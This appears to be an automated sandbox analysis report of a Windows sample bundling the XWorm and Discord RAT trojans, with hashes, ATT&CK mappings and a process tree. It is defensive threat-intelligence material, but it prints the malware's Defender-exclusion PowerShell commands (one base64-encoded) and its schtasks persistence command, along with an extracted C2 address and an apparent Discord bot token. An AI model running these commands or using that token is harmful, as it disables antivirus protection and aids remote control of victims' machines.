Analysis

  • max time kernel
    148s
  • max time network
    155s
  • platform
    windows7_x64
  • resource
    win7-20240221-en
  • resource tags

    arch:x64arch:x86image:win7-20240221-enlocale:en-usos:windows7-x64system
  • submitted
    21-05-2024 17:55

General

  • Target

    RoseBETA2/Rose.exe

  • Size

    7.1MB

  • MD5

    e3a5864bd287c04b45c643e12b4ed47f

  • SHA1

    9ab0757a2cf6f8470d748ab353b3f1bdd4c8f4e5

  • SHA256

    e3a6cc03b47e76ff8b453136726a443c72b6f15ea146559bde34e11fb86fe9c6

  • SHA512

    fb3717826e0fd4c5b1e6cb276c041752a686aa921a702e35431a8511b3a1496c91e723aaf153d696fe62a984c9c780f04aae5bfc6b586b099f586c06ab59ab7b

  • SSDEEP

    196608:3z72FcW+16K2VMf/89/jGCtw9kx6Vro3Kv06u:3As69+/89/jP+kE8l

Malware Config

Extracted

Family

xworm

C2

3.125.209.94:13551

Attributes
  • Install_directory

    %AppData%

  • install_file

    Roaming5.exe

Extracted

Family

discordrat

Attributes
  • discord_token

    MTIzODIyMjM1NTkxNDk0ODYxOA.GIhaBv.jW6xqCJH4cBG7Z95TuFbhmiRz3U2zCK9bD4ZH0

  • server_id

    1237864378947207299

Signatures

  • Detect Xworm Payload 3 IoCs
  • Discord RAT

    A RAT written in C# using Discord as a C2.

  • Xworm

    Xworm is a remote access trojan written in C#.

  • Command and Scripting Interpreter: PowerShell 1 TTPs 5 IoCs

    Using powershell.exe command.

  • Drops startup file 2 IoCs
  • Executes dropped EXE 6 IoCs
  • Loads dropped DLL 15 IoCs
  • UPX packed file 2 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Adds Run key to start application 2 TTPs 1 IoCs
  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Drops file in Windows directory 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Creates scheduled task(s) 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 6 IoCs
  • Suspicious use of AdjustPrivilegeToken 9 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 43 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

Processes

  • C:\Users\Admin\AppData\Local\Temp\RoseBETA2\Rose.exe
    "C:\Users\Admin\AppData\Local\Temp\RoseBETA2\Rose.exe"
    1⤵
    • Loads dropped DLL
    • Drops file in Windows directory
    • Suspicious use of WriteProcessMemory
    PID:1696
    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGwAYQBzACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHQAaQBqACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAG0AZABxACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGwAcABqACMAPgA="
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:2096
    • C:\Windows\XClient - Copy (2).exe
      "C:\Windows\XClient - Copy (2).exe"
      2⤵
      • Drops startup file
      • Executes dropped EXE
      • Adds Run key to start application
      • Suspicious behavior: AddClipboardFormatListener
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of SetWindowsHookEx
      • Suspicious use of WriteProcessMemory
      PID:2636
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Windows\XClient - Copy (2).exe'
        3⤵
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:844
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'XClient - Copy (2).exe'
        3⤵
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:2104
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Roaming5.exe'
        3⤵
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:2856
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'Roaming5.exe'
        3⤵
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:952
      • C:\Windows\System32\schtasks.exe
        "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "Roaming5" /tr "C:\Users\Admin\AppData\Roaming\Roaming5.exe"
        3⤵
        • Creates scheduled task(s)
        PID:1880
    • C:\Users\Admin\AppData\Local\Built.exe
      "C:\Users\Admin\AppData\Local\Built.exe"
      2⤵
      • Executes dropped EXE
      • Suspicious use of WriteProcessMemory
      PID:2556
      • C:\Users\Admin\AppData\Local\Built.exe
        "C:\Users\Admin\AppData\Local\Built.exe"
        3⤵
        • Executes dropped EXE
        • Loads dropped DLL
        PID:2940
    • C:\Users\Admin\Client-built.exe
      "C:\Users\Admin\Client-built.exe"
      2⤵
      • Executes dropped EXE
      • Suspicious use of WriteProcessMemory
      PID:2684
      • C:\Windows\system32\WerFault.exe
        C:\Windows\system32\WerFault.exe -u -p 2684 -s 600
        3⤵
        • Loads dropped DLL
        PID:1488
  • C:\Windows\system32\taskeng.exe
    taskeng.exe {78309538-8148-4425-A4F3-A15F4B5E5281} S-1-5-21-1298544033-3225604241-2703760938-1000:IZKCKOTP\Admin:Interactive:[1]
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:2608
    • C:\Users\Admin\AppData\Roaming\Roaming5.exe
      C:\Users\Admin\AppData\Roaming\Roaming5.exe
      2⤵
      • Executes dropped EXE
      • Suspicious use of AdjustPrivilegeToken
      PID:2464
    • C:\Users\Admin\AppData\Roaming\Roaming5.exe
      C:\Users\Admin\AppData\Roaming\Roaming5.exe
      2⤵
      • Executes dropped EXE
      • Suspicious use of AdjustPrivilegeToken
      PID:2428

Network

MITRE ATT&CK Matrix ATT&CK v13

Execution

Command and Scripting Interpreter

1
T1059

PowerShell

1
T1059.001

Scheduled Task/Job

1
T1053

Persistence

Boot or Logon Autostart Execution

1
T1547

Registry Run Keys / Startup Folder

1
T1547.001

Scheduled Task/Job

1
T1053

Privilege Escalation

Boot or Logon Autostart Execution

1
T1547

Registry Run Keys / Startup Folder

1
T1547.001

Scheduled Task/Job

1
T1053

Defense Evasion

Modify Registry

1
T1112

Discovery

System Information Discovery

1
T1082

Query Registry

1
T1012

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Local\Temp\_MEI25562\api-ms-win-core-file-l1-2-0.dll
    Filesize

    21KB

    MD5

    bcb8b9f6606d4094270b6d9b2ed92139

    SHA1

    bd55e985db649eadcb444857beed397362a2ba7b

    SHA256

    fa18d63a117153e2ace5400ed89b0806e96f0627d9db935906be9294a3038118

    SHA512

    869b2b38fd528b033b3ec17a4144d818e42242b83d7be48e2e6da6992111758b302f48f52e0dd76becb526a90a2b040ce143c6d4f0e009a513017f06b9a8f2b9

  • C:\Users\Admin\AppData\Local\Temp\_MEI25562\api-ms-win-core-file-l2-1-0.dll
    Filesize

    18KB

    MD5

    bfffa7117fd9b1622c66d949bac3f1d7

    SHA1

    402b7b8f8dcfd321b1d12fc85a1ee5137a5569b2

    SHA256

    1ea267a2e6284f17dd548c6f2285e19f7edb15d6e737a55391140ce5cb95225e

    SHA512

    b319cc7b436b1be165cdf6ffcab8a87fe29de78f7e0b14c8f562be160481fb5483289bd5956fdc1d8660da7a3f86d8eede35c6cc2b7c3d4c852decf4b2dcdb7f

  • C:\Users\Admin\AppData\Local\Temp\_MEI25562\api-ms-win-core-localization-l1-2-0.dll
    Filesize

    21KB

    MD5

    20ddf543a1abe7aee845de1ec1d3aa8e

    SHA1

    0eaf5de57369e1db7f275a2fffd2d2c9e5af65bf

    SHA256

    d045a72c3e4d21165e9372f76b44ff116446c1e0c221d9cea3ab0a1134a310e8

    SHA512

    96dd48df315a7eea280ca3da0965a937a649ee77a82a1049e3d09b234439f7d927d7fb749073d7af1b23dadb643978b70dcdadc6c503fe850b512b0c9c1c78dd

  • C:\Users\Admin\AppData\Local\Temp\_MEI25562\api-ms-win-core-processthreads-l1-1-1.dll
    Filesize

    21KB

    MD5

    4380d56a3b83ca19ea269747c9b8302b

    SHA1

    0c4427f6f0f367d180d37fc10ecbe6534ef6469c

    SHA256

    a79c7f86462d8ab8a7b73a3f9e469514f57f9fe456326be3727352b092b6b14a

    SHA512

    1c29c335c55f5f896526c8ee0f7160211fd457c1f1b98915bcc141112f8a730e1a92391ab96688cbb7287e81e6814cc86e3b057e0a6129cbb02892108bfafaf4

  • C:\Users\Admin\AppData\Local\Temp\_MEI25562\api-ms-win-core-timezone-l1-1-0.dll
    Filesize

    21KB

    MD5

    2554060f26e548a089cab427990aacdf

    SHA1

    8cc7a44a16d6b0a6b7ed444e68990ff296d712fe

    SHA256

    5ab003e899270b04abc7f67be953eaccf980d5bbe80904c47f9aaf5d401bb044

    SHA512

    fd4d5a7fe4da77b0222b040dc38e53f48f7a3379f69e2199639b9f330b2e55939d89ce8361d2135182b607ad75e58ee8e34b90225143927b15dcc116b994c506

  • C:\Users\Admin\AppData\Local\Temp\_MEI25562\python310.dll
    Filesize

    1.4MB

    MD5

    178a0f45fde7db40c238f1340a0c0ec0

    SHA1

    dcd2d3d14e06da3e8d7dc91a69b5fd785768b5fe

    SHA256

    9fcb5ad15bd33dd72122a171a5d950e8e47ceda09372f25df828010cde24b8ed

    SHA512

    4b790046787e57b9414a796838a026b1530f497a75c8e62d62b56f8c16a0cbedbefad3d4be957bc18379f64374d8d3bf62d3c64b53476c7c5005a7355acd2cee

  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\KDBRJONWQTQLJI25HT6Y.temp
    Filesize

    7KB

    MD5

    009d630c3933ce47b86a3c2f538d26d9

    SHA1

    f5921bc9d7b6e1d683705028db0d90dc4ea86b37

    SHA256

    65a282c1aac69721ba176c9fcb81d9f8c993ff65219f24fe86542ac326477e31

    SHA512

    84ef21efe45f6f7ecd1e54f09582d4d4aa776ca5328ab5e3a104636c84a976140fbf0bb2a6dfb3fc053913fc4a0042ca345596bb8deaf09cf05d5e1409a2f17b

  • C:\Users\Admin\Client-built.exe
    Filesize

    78KB

    MD5

    772f55ff66b453cb13c22bab187923f8

    SHA1

    babcadea40b03526c4012e876a46e73e4cd99823

    SHA256

    e0e48ac39bd7ace97549ebfb470936c058ee42b935ecee31b6e907e5845676c4

    SHA512

    1da7e00cb8608507014f377617e67aef798df512698fe96aa94bb8c5c9ad559122c833c73b0b350d0f4c40c0bb821740c5a04dd00b3a39c57e3bbe6fb3b83f6b

  • C:\Windows\XClient - Copy (2).exe
    Filesize

    84KB

    MD5

    1a2bc2920343306bacef613b499d238d

    SHA1

    26f3caa75790e6479eda5b0e2790c22f3e0e5090

    SHA256

    621d16d9de023d962f59efed9dd6d4234e3e667c824ea248b0de354a2bd2bf0b

    SHA512

    868a1f58992be96440c5e36cecf117b2aef9a950e8f051bb0c7209e3697d00b7339730ed1bc565a97260109888f3d8079d5928508b700c3574945088b3df4215

  • \Users\Admin\AppData\Local\Built.exe
    Filesize

    6.7MB

    MD5

    05b323f8cca7150d1c99447d32f3fdf8

    SHA1

    1cab9ce03a658637419287dbe59abdf796d012c6

    SHA256

    612d272a6109b628fd07d5c07a2e9338d4a8f31b3c21241d947e68c6e69c60dd

    SHA512

    00da24f807f42009cf2016614ed7657464157aacb58399bf0376ccf70ca0afb1cfaa25f74cb28e9c471b796f8e3a555000971a67700193e0c4b9ffc863077d42

  • \Users\Admin\AppData\Local\Temp\_MEI25562\ucrtbase.dll
    Filesize

    992KB

    MD5

    0e0bac3d1dcc1833eae4e3e4cf83c4ef

    SHA1

    4189f4459c54e69c6d3155a82524bda7549a75a6

    SHA256

    8a91052ef261b5fbf3223ae9ce789af73dfe1e9b0ba5bdbc4d564870a24f2bae

    SHA512

    a45946e3971816f66dd7ea3788aacc384a9e95011500b458212dc104741315b85659e0d56a41570731d338bdf182141c093d3ced222c007038583ceb808e26fd

  • memory/844-106-0x000000001B860000-0x000000001BB42000-memory.dmp
    Filesize

    2.9MB

  • memory/844-107-0x0000000001E90000-0x0000000001E98000-memory.dmp
    Filesize

    32KB

  • memory/2104-113-0x000000001B760000-0x000000001BA42000-memory.dmp
    Filesize

    2.9MB

  • memory/2104-114-0x0000000001D90000-0x0000000001D98000-memory.dmp
    Filesize

    32KB

  • memory/2464-186-0x0000000001140000-0x000000000115C000-memory.dmp
    Filesize

    112KB

  • memory/2636-64-0x0000000000E90000-0x0000000000EAC000-memory.dmp
    Filesize

    112KB

  • memory/2684-70-0x000000013F520000-0x000000013F538000-memory.dmp
    Filesize

    96KB

  • memory/2940-96-0x000007FEF1C50000-0x000007FEF20BE000-memory.dmp
    Filesize

    4.4MB